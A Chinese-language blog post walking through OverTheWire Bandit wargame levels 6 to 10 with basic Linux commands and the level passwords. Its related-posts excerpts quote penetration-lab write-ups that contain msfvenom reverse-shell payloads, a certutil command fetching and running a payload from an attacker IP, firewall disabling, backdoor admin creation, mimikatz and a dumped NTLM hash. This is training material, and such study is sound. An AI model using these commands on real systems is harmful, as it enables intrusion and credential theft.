OverTheWire Bandit Level 6 to Level 10

-

 OverTheWire Bandit Level 6 to Level 10


Level 6 --> Level 7 :

The password for the next level is stored somewhere on the server and has all of the following properties:

  • owned by user bandit7
  • owned by group bandit6
  • 33 bytes in size

下一級的密碼存儲在服務器上的某個位置,並具有以下所有屬性:

由用戶 bandit7 所有

由群組 bandit6 所有

大小為 33 bytes

因為不知道檔案在哪個路徑,所以先將路徑切換到跟目錄 /

執行 find 搜尋檔案

-type f : 搜尋目標是一個檔案

-user bandit7 : owned by user bandit7

-group bandit6 : owned by group bandit6

-size 33c : 檔案大小指定為 33 bytes

2>/dev/null : 將 permission deny 的直接輸入到黑洞

指令 : find -type f -user bandit7 -group bandit6 -size 33c 2>/dev/null

不切換到跟目錄的話可以這樣下

指令 : find / -type f -user bandit7 -group bandit6 -size 33c 2>/dev/null

搜尋到檔案 : ./var/lib/dpkg/info/bandit7.password

直接 cat 後得到答案

bandit7 密碼 : z7WtoNQU2XfjmMtWA8u5rN4vzqu4v99S






Level 7 --> Level 8 :

The password for the next level is stored in the file data.txt next to the word millionth

下一級的密碼存儲在文件 data.txt 中,且在單詞 "millionth" 旁邊


登入後 ls 即可看到 data.txt
cat 後 grep 篩選 millionth 即得到答案

bandit8 密碼 : TESKZC0XvTetK0S9xNwm25STk5iWrBvP






Level 8 --> Level 9 :

The password for the next level is stored in the file data.txt and is the only line of text that occurs only once

下一級的密碼存儲在文件 data.txt 中,並且是唯一行出現一次的文本行

看完題目檔案中應該是有很多字串重複出現在該檔案中
答案是唯一僅出現過一次的一行,所以先進行排序再列出僅有一行的那個值

登入後一樣 ls 即可看到 data.txt,所以就直接下 sort & uniq 指令

指令 : cat data.txt | sort | uniq -u

uniq 參數 : -u 只輸出沒有重複的文字行,-c 重複的次數統計

bandit9 密碼 : EN632PlfYiZbn3PhVK3XOGSlNInNE00t






Level 9 --> Level 10 :

The password for the next level is stored in the file data.txt in one of the few human-readable strings, preceded by several ‘=’ characters.

下一級的密碼存儲在文件 data.txt 中,位於少數幾個人類可讀的字符串之一中,前面有幾個“=”字符。

指令 : cat data.txt | strings | grep ^=

strings 可以將二進位檔可閱讀部份輸出到螢幕上

輸出後透過 grep 顯示開頭是 "=" 的字串,亦可直接輸出包含 "=" 的字串

輸出一看就知道答案是哪一個了

bandit10 密碼 : G7w8LIi6J3kTb8A7j9LgrywtEUlyyp6s






Level 10 --> Level 11 :

The password for the next level is stored in the file data.txt, which contains base64 encoded data

下一級的密碼存儲在文件data.txt中,其中包含 base64 編碼的數據


ls 確認檔案,接著 cat 可以看到只有一行



題目提到 base64 編碼,所以直接將輸出結果用 base64 --decode 解碼即得答案

bandit11 密碼 : 6zPeziLdR2RKNdNYFNb6nVCKzphlXHBM






留言

張貼留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

-
圖片
Challenge 0 - Secura(2) 下一步就是先想辦法進入第二台 .96 Rustscan 看一下,看來這一台的梗在 3306 MySQL 上 測試了一下遠端 IP 被阻擋進入 MySQL 從已經打入的第一台 .95(SECURE) 搭建 chisel 去登入 .96 的 MySQL 看來也不行 先在第一台 .95 建立一個使用者 aries 與密碼 Oscp#1234 net user aries Oscp#1234 /add 加入到本機的 administrators 群組 net localgroup administrators aries /add 開啟 RDP reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f 關掉 firewall netsh advfirewall set allprofiles state off RDP 進去開始枚舉,└─$ xfreerdp -v:192.168.204.95 -u:aries -p:'Oscp#1234' +clipboard -cert:ignore -drive:aries,/home/kali/lab0/95 網域簡名 SECURA 網域全名 secura.yzx 這一台有跑 PostgreSQL DB 跑在本機的 127.0.0.1 15432 Port 查找 *.kdbx & *.zip 發現 PostgreSQL 帳號密碼 postgres:appmanager 測試帳號密碼有效 甚麼都不能執行也找不到有用的資訊 暫時沒有方向,回到 .97 先枚舉使用者看看 ./kerbrute_linux_amd64 userenum --dc 192.168.204.97 -d secura.yzx -o kerbrute-user-enum xato-net-10-million-usernames.txt 獲得使用者帳號 michael、charlotte、secure、administrator、era 這幾個使用者都沒有 ASREP ./GetNPUsers....
閱讀完整內容

濫用 Windows 庫文件(Library File)

-
圖片
 濫用 Windows 庫文件(Library File) 首先在 Kali 上設置一個 WebDAV 共享,透過 pip3 先行安裝 指令 pip3 install wsgidav 建立一個路徑 /home/kali_r/webdav 目錄以用作包含 .link 文件的 WebDAV 共享 先在此路徑下建立一個 test.txt 文件 mkdir /home/kali_r/webdav & touch /home/kali_/webdav/test.txt 接下來將從 /home/kali_r/.local/bin 目錄運行 WsgiDAV。整個過程中使用 wsgidav 作為啟動服務器的命令。 提供的第一個參數是 --host,它指定要提供服務的主機 我們將監聽所有帶有 0.0.0.0 的接口 接下來使用 --port=80 指定偵聽端口,並使用 --auth=anonymous 禁用對共享的身份驗證 最後使用 --root /home/kali_r/webdav/ 設置為 WebDAV 共享目錄的根目錄 指令 └─$ /home/kali_r/.local/bin/wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root /home/kali_r/webdav/ netstat 一下可以看到已經有 listen 80 Port 用瀏覽器開啟測試,可以看到前面建立的 test.txt 接著使用 xfreerdp 登入到某台 windows  帳號 : offsec、密碼 : lab、掛載本機的 /home/kali_r 為遠端的網路磁碟機 aries └─$ xfreerdp -v:192.168.203.194 -u:offsec -p:lab -drive:aries,/home/kali_r 使用該台機器已安裝的 Visual Studio Code 來進行編輯接下來要用的攻擊檔案 建立一個新的文字檔 建立如下內容檔案 下面的列表包含庫文件的命名空間 。這是從 Windows 7 開始的庫文件格式版本的命名空間。該列表還包含庫描述的結束標記。涵蓋的以下所有標籤都將添加到 libraryDescription 標籤內。 <?xml version="1...
閱讀完整內容

Challenge 0 - Secura(1)

-
圖片
 Challenge 0 - Secura(1) Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧 環境說明共三台機器,簡單掃了一下  - 95 : Web Server 感覺像是進入點  - 96 : DB 伺服器  - 97 : DC 95 8443 Port 打開是 AppManager14 版本是 14710 使用預設帳號密碼 admin:admin 可以直接登入 跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功 5001 / 參考 Pentest Everything :  https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/metallus 自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe 接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ] 設定執行的檔案為 cmd.bat 建立一個 cmd.bat,內容如下 certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe 上傳 cmd.bat 執行該 Script,成功拿到 Rever Shell whoami 看一下,進來就是 nt authority\system 直接拿 flag 跑一下 mimikatz.exe administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14 測試看看 e...
閱讀完整內容